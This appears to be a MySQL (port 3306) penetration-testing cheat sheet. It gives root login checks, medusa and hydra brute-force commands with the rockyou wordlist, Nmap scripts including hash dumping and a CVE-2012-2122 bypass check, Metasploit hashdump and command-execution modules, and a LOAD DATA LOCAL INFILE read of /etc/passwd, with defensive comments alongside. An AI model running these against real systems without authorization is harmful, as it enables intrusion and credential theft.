
3306 - Pentesting mysql

Connect

Install mysql client

# Debian/Ubuntu: metapackage that installs the distribution's default
# MySQL-compatible command-line client (provides the `mysql` command).
sudo apt install default-mysql-client

Local

# Local connection checks against the root account.
mysql -u root # No password is sent: succeeds only if root has an empty password or is authenticated some other way (e.g. through the local socket)
mysql -u root -p # Prompts for the password, which keeps it out of shell history and the process list
# "password" below is a placeholder. A password given on the command line can be
# exposed through shell history and process listings; prefer the -p prompt above.
mysql --user=root --password=password

Remote

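# Remote connection checks. `target` is a shell variable holding the MySQL host.
# It is written as "$target" because $(target) is command substitution: the
# shell would try to run a program named "target" and pass its output as the host.
: "${target:?set target to the MySQL host first}"

# A successful login here means root is not restricted to local connections
# and has an empty password.
mysql -h "$target" -u root
# Sends the literal user name "root@localhost".
mysql -h "$target" -u root@localhost
# "password" is a placeholder. A password on the command line can be exposed
# through shell history and process listings; -p prompts for it instead.
mysql -h "$target" --user=root --password=password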

Bruteforce

medusa

# Password guessing against the root account with medusa:
#   -M mysql  protocol module      -u root  account tested
#   -P FILE   password wordlist    -t 20    logins tested in parallel
#   -f        stop after the first valid credential for the host
# $(target) is a placeholder for the host; a shell reads it as command
# substitution, so replace it with the host name or a quoted variable.
# Defensive view: this appears as a burst of failed logins for one account from
# one source. Per-account lockout (FAILED_LOGIN_ATTEMPTS / PASSWORD_LOCK_TIME,
# MySQL 8.0.19+) and restricting network access to port 3306 limit its effect.
medusa -h $(target) -M mysql -u root -P /usr/share/wordlists/rockyou.txt -t 20 -f
hydra
# Password guessing against the root account with hydra:
#   -l root  account tested         -P FILE  password wordlist
#   -t 20    parallel tasks         -f       stop after the first valid credential
# $(target) is a placeholder for the host; a shell reads it as command
# substitution, so replace it with the host name or a quoted variable.
# Defensive view: repeated failed logins for a single account from one address
# are the signal to alert on; account lockout and network filtering of port
# 3306 are the corresponding mitigations.
hydra -l root -P /usr/share/wordlists/rockyou.txt $(target) mysql -t 20 -f

Enumerate

Nmap

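# Nmap NSE checks for MySQL on TCP 3306. `target` is a shell variable holding
# the host; it is written as "$target" because $(target) is command
# substitution and would try to run a program named "target".
# Several of these scripts return data only when valid credentials or extra
# script arguments are supplied (passed with --script-args; see each script's
# NSE documentation).
: "${target:?set target to the MySQL host first}"

nmap -p3306 --script=mysql-enum "$target"
nmap -p3306 --script=mysql-audit "$target"
nmap -p3306 --script=mysql-databases "$target"
nmap -p3306 --script=mysql-dump-hashes "$target"
# Reports accounts that accept an empty password.
nmap -p3306 --script=mysql-empty-password "$target"
# Reads version and capability details from the server handshake.
nmap -p3306 --script=mysql-info "$target"
nmap -p3306 --script=mysql-query "$target"
nmap -p3306 --script=mysql-users "$target"
nmap -p3306 --script=mysql-variables "$target"
# Tests for the CVE-2012-2122 authentication bypass.
nmap -p3306 --script=mysql-vuln-cve2012-2122 "$target"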

Metasploit

  • msf> use auxiliary/admin/mysql/mysql_sql
  • msf> use auxiliary/scanner/mysql/mysql_version
  • msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
  • msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
  • msf> use auxiliary/admin/mysql/mysql_enum #Creds
  • msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
  • msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

MySQL Commands

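-- Basic orientation after connecting. <database-name> and <table-name> are
-- placeholders to replace with real identifiers.
show databases;
use <database-name>;
show tables;
-- The mysql client runs a statement only once it sees the terminating
-- delimiter (;), so the final statement needs one as well.
select * from <table-name>;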

MySQL arbitrary file read via the client

-- LOAD DATA LOCAL INFILE makes the client read the named file from the client
-- host and send it to the server, which loads it into table "test".
-- It works only when LOCAL loading is enabled on both the server and the client.
-- The server-side switch is the local_infile system variable (OFF by default
-- in MySQL 8.0). Mitigation: keep it disabled, and do not enable local-infile
-- in clients that may connect to untrusted servers.
mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';